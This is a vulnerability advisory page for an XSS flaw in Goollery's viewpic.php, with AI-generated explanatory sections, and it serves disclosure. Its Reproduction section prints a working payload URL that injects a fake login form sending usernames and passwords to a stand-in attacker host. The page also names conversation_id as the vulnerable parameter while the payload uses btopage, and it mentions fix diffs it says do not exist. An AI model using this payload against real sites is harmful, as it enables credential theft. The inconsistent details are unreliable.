CVE-2004-2246
Description
Goollery before 0.04b is vulnerable to XSS via the conversation_id parameter in viewpic.php, allowing remote attackers to inject HTML or script.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Goollery before 0.04b is vulnerable to XSS via the conversation_id parameter in viewpic.php, allowing remote attackers to inject HTML or script.
Vulnerability
A cross-site scripting (XSS) vulnerability exists in Goollery versions prior to 0.04b. The vulnerability is located in the viewpic.php script and is triggered by the conversation_id parameter. The application fails to properly sanitize user-supplied URI input, allowing for the injection of arbitrary HTML or web script [1].
Exploitation
A remote attacker can craft a malicious URI link containing hostile HTML and script code. If a victim user clicks on this link, the malicious code may be rendered in their web browser. The attacker needs to trick the user into visiting a specially crafted URL that includes the vulnerable conversation_id parameter [1].
Impact
Successful exploitation of this vulnerability allows a remote attacker to inject arbitrary HTML or web script into the victim's browser. This can lead to various attacks, such as session hijacking, phishing, or defacement, depending on the injected script [1].
Mitigation
This vulnerability is fixed in Goollery version 0.04b. Users are advised to upgrade to this version or later. No other mitigation details or workarounds are disclosed in the available references [1].
AI Insight generated on Jun 2, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"The application fails to properly sanitize user-supplied URI input, allowing arbitrary HTML or web script injection."
Attack vector
A remote attacker can craft a malicious URI link containing arbitrary HTML or script code. This link is sent to the victim user, and if followed, the malicious code is rendered in the victim's web browser. The vulnerability specifically lies in the `conversation_id` parameter of the `viewpic.php` script [ref_id=1].
Affected code
The vulnerability exists in the `viewpic.php` script, specifically related to the handling of the `conversation_id` parameter [ref_id=1]. The failure to sanitize user-supplied URI input in this script allows for the injection of malicious HTML and script code.
What the fix does
The advisory does not specify a patch or provide details on how the vulnerability is fixed. It is recommended to upgrade to Goollery version 0.04b or later. The patch is not available in the provided information.
Preconditions
- inputThe attacker must provide a crafted URI with malicious HTML or script code in the `conversation_id` parameter.
- networkThe attacker must be able to send the malicious URI to a victim.
Reproduction
http://www.example.com/goollery/viewpic.php?id=2&conversation_id=ffee00b71f3931a&btopage=<form%20action="http://www.atacker.com/save2db.asp"%20method="post">Username:<input%20na me="username"%20type="text"%20maxlength="30"><br>Password:<input%20name="password"%20type="text"%20maxlength="30"><br><input%20name="login"%20type="submit"%20value="Login"></form> [ref_id=1]
Generated on Jun 2, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
2- www.osvdb.org/11624nvdExploitPatch
- www.osvdb.org/ref/11/11624-goollery-viewpic.txtnvdExploit
News mentions
0No linked articles in our index yet.